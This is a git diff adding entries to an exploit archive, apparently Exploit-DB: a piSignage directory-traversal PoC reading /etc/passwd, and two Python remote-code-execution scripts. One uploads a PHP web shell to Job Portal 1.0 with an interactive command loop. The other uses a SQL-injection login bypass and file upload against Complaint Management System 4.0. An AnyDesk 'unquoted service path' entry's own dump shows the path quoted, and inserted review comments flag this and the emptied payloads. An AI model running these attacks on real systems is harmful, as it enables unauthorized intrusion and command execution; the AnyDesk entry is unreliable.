diff --git a/exploits/hardware/webapps/47882.txt b/exploits/hardware/webapps/47882.txt
new file mode 100644
index 000000000..f3c232c51
--- /dev/null
+++ b/exploits/hardware/webapps/47882.txt
@@ -0,0 +1,19 @@
+# Exploit Title: piSignage 2.6.4 - Directory Traversal
+# Date: 2019-11-13
+# Exploit Author: JunYeong Ko
+# Vendor Homepage: https://pisignage.com/
+# Version: piSignage before 2.6.4
+# Tested on: piSignage before 2.6.4
+# CVE : CVE-2019-20354
+
+Summary:
+The web application component of piSignage before 2.6.4 allows a remote attacker (authenticated as a low-privilege user) to download arbitrary files from the Raspberry Pi via api/settings/log?file=../ path traversal. In other words, this issue is in the player API for log download.
+
+PoC:
+1. Click the Log Download button at the bottom of the 'piSignage' administration page.
+2. HTTP Packet is sent when the button is pressed.
+3. Change the value of 'file' parameter to ../../../../../../../../../../etc/passwd.
+4. You can see that the /etc/passwd file is read.
+
+References:
+https://github.com/colloqi/piSignage/issues/97
\ No newline at end of file
diff --git a/exploits/php/webapps/47881.py b/exploits/php/webapps/47881.py
new file mode 100755
index 000000000..a35db8eff
--- /dev/null
+++ b/exploits/php/webapps/47881.py
@@ -0,0 +1,47 @@
+# Exploit Title: Job Portal 1.0 - Remote Code Execution
+# Google Dork: N/A
+# Date: 2020-01-03
+# Exploit Author: Tib3rius
+# Vendor Homepage: https://phpgurukul.com/job-portal-project/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7855
+# Version: 1.0
+# Tested on: Ubuntu 16.04
+# CVE: N/A
+
+import argparse
+import random
+import requests
+import string
+import sys
+
+parser = argparse.ArgumentParser()
+parser.add_argument('url', action='store', help='The URL of the target.')
+args = parser.parse_args()
+
+url = args.url.rstrip('/')
+random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))
+
+payload = ''
+
+file = {'file': (random_file + '.php', payload, 'text/php')}
+print('> Attempting to upload PHP web shell...')
+r = requests.post(url + '/admin/gallery.php', files=file, data={'submit':'1'}, verify=False)
+print('> Verifying shell upload...')
+r = requests.get(url + '/admin/uploadimg/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)
+
+if random_file in r.text:
+    print('> Web shell uploaded to ' + url + '/admin/uploadimg/' + random_file + '.php')
+    print('> Example command usage: ' + url + '/admin/uploadimg/' + random_file + '.php?cmd=whoami')
+    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
+    if launch_shell.lower() == 'y':
+        while True:
+            cmd = str(input('RCE $ '))
+            if cmd == 'exit':
+                sys.exit(0)
+            r = requests.get(url + '/admin/uploadimg/' + random_file + '.php', params={'cmd':cmd}, verify=False)
+            print(r.text)
+else:
+    if r.status_code == 200:
+        print('> Web shell uploaded to ' + url + '/admin/uploadimg/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
+    else:
+        print('> Web shell failed to upload! The web server may not have write permissions.')
\ No newline at end of file
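Review bot: `payload = ''` leaves the uploaded file body empty, so the script as committed uploads a zero-byte .php and the `echo` verification that follows can never match, yet nothing in the file says the body was deliberately stripped for publication. A comment on that line such as `# payload intentionally omitted from the published PoC` would tell a reader that the "command check failed" branch is the expected outcome of this listing rather than a bug. The same undocumented empty body appears in 47884.py at `ufile = {'compfile':('command.php', '')}` and deserves the same comment there.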
diff --git a/exploits/php/webapps/47884.py b/exploits/php/webapps/47884.py
new file mode 100755
index 000000000..4af5294e9
--- /dev/null
+++ b/exploits/php/webapps/47884.py
@@ -0,0 +1,64 @@
+# Exploit Title: Complaint Management System 4.0 - Remote Code Execution
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/complaint-management-sytem/
+# Version: v4.0
+# Category: Webapps
+# Tested on: Xampp for Windows
+# Description:
+# There isn't any file extension control at the "Register Complaint" section of user panel.
+# An unauthorized user can upload and execute php file.
+# Below basic python script will bypass authentication and execute command on target server.
+
+poc.py
+
+#!/usr/bin/python
+
+import requests
+import sys
+
+
+if len(sys.argv) !=3:
+    print "[*] Usage: PoC.py rhost/rpath command"
+    print "[*] e.g.: PoC.py 127.0.0.1/cms ipconfig"
+    exit(0)
+
+rhost = sys.argv[1]
+command = sys.argv[2]
+
+#authentication bypass
+url = "http://"+rhost+"/users/index.php"
+data = {"username": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}
+
+with requests.Session() as session:
+
+    login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+
+
+    #check authentication bypass
+    check = session.get("http://"+rhost+"/users/dashboard.php", allow_redirects=False)
+    print ("[*] Status code for login: %s"%check.status_code)
+    if check.status_code == 200:
+        print ("[+] Authentication bypass was successfull")
+    else:
+        print ("[-] Authentication bypass was unsuccessful")
+        sys.exit()
+
+    #upload php file
+    ufile = {'compfile':('command.php', '')}
+    fdata = {"category": "1", "subcategory": "Online Shopping", "complaintype": " Complaint", "state": "Punjab", "noc": "the end", "complaindetails": "the end","compfile": "commmand.php", "submit": ""}
+    furl = "http://"+rhost+"/users/register-complaint.php"
+    fupload = session.post(url=furl, files= ufile, data=fdata)
+
+    #execution
+    final=session.get("http://"+rhost+"/users/complaintdocs/command.php?cmd="+command)
+
+    if final.status_code == 200:
+        print "[+] Command execution completed successfully.\n"
+        print "\tPut on a happy face.\n"
+    else:
+        print "[-] Command execution was unsuccessful."
+        print "\tOne bad day!"
+        sys.exit()
+
+    print final.text
\ No newline at end of file
diff --git a/exploits/windows/local/47883.txt b/exploits/windows/local/47883.txt
new file mode 100644
index 000000000..bf1fbdd4e
--- /dev/null
+++ b/exploits/windows/local/47883.txt
@@ -0,0 +1,18 @@
+# Exploit Title: AnyDesk 5.4.0 - Unquoted Service Path
+# Exploit Author: SajjadBnd
+# Date: 2019-12-23
+# Vendor Homepage: http://anydesk.com
+# Software Link: https://download.anydesk.com/AnyDesk.exe
+# Version: Software Version 5.4.0
+# Tested on: Win10 x64
+
+SERVICE_NAME: AnyDesk
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : AnyDesk Service
+ DEPENDENCIES : RpcSs
+ SERVICE_START_NAME: LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 382fc14cc..f28194a36 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
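Review bot: The service dump committed in 47883.txt shows the executable path already enclosed in quotes, `BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service`, so the evidence in the file does not demonstrate the unquoted service path the title claims; a quoted image path with a space in it is exactly the configuration that is not subject to that issue. Either the dump was captured from a different build than the one described or the entry is a false positive, and the file should say which, since a defender triaging this advisory would otherwise spend time confirming a condition the dump itself rules out. A line under the header such as `# Note: the sc qc output below shows the path quoted; see <explanation>` (with the author's actual observation in place of the placeholder) would resolve the contradiction.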
@@ -10884,6 +10884,7 @@ id,file,description,date,author,type,platform,port
 47845,exploits/windows/local/47845.txt,"Plantronics Hub 3.13.2 - Local Privilege Escalation",2020-01-03,Markus,local,windows,
 47852,exploits/windows/local/47852.txt,"Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path",2020-01-06,ZwX,local,windows,
 47880,exploits/windows/local/47880.cc,"Windows - Shell COM Server Registrar Local Privilege Escalation",2020-01-02,0vercl0k,local,windows,
+47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42182,3 +42183,6 @@ id,file,description,date,author,type,platform,port
 47875,exploits/php/webapps/47875.txt,"Voyager 1.3.0 - Directory Traversal",2020-01-06,NgoAnhDuc,webapps,php,
 47876,exploits/php/webapps/47876.txt,"Codoforum 4.8.3 - Persistent Cross-Site Scripting",2020-01-06,Prasanth,webapps,php,
 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,
+47881,exploits/php/webapps/47881.py,"Job Portal 1.0 - Remote Code Execution",2020-01-07,Tib3rius,webapps,php,
+47882,exploits/hardware/webapps/47882.txt,"piSignage 2.6.4 - Directory Traversal",2020-01-07,"JunYeong Ko",webapps,hardware,
+47884,exploits/php/webapps/47884.py,"Complaint Management System 4.0 - Remote Code Execution",2020-01-07,"Metin Yunus Kandemir",webapps,php,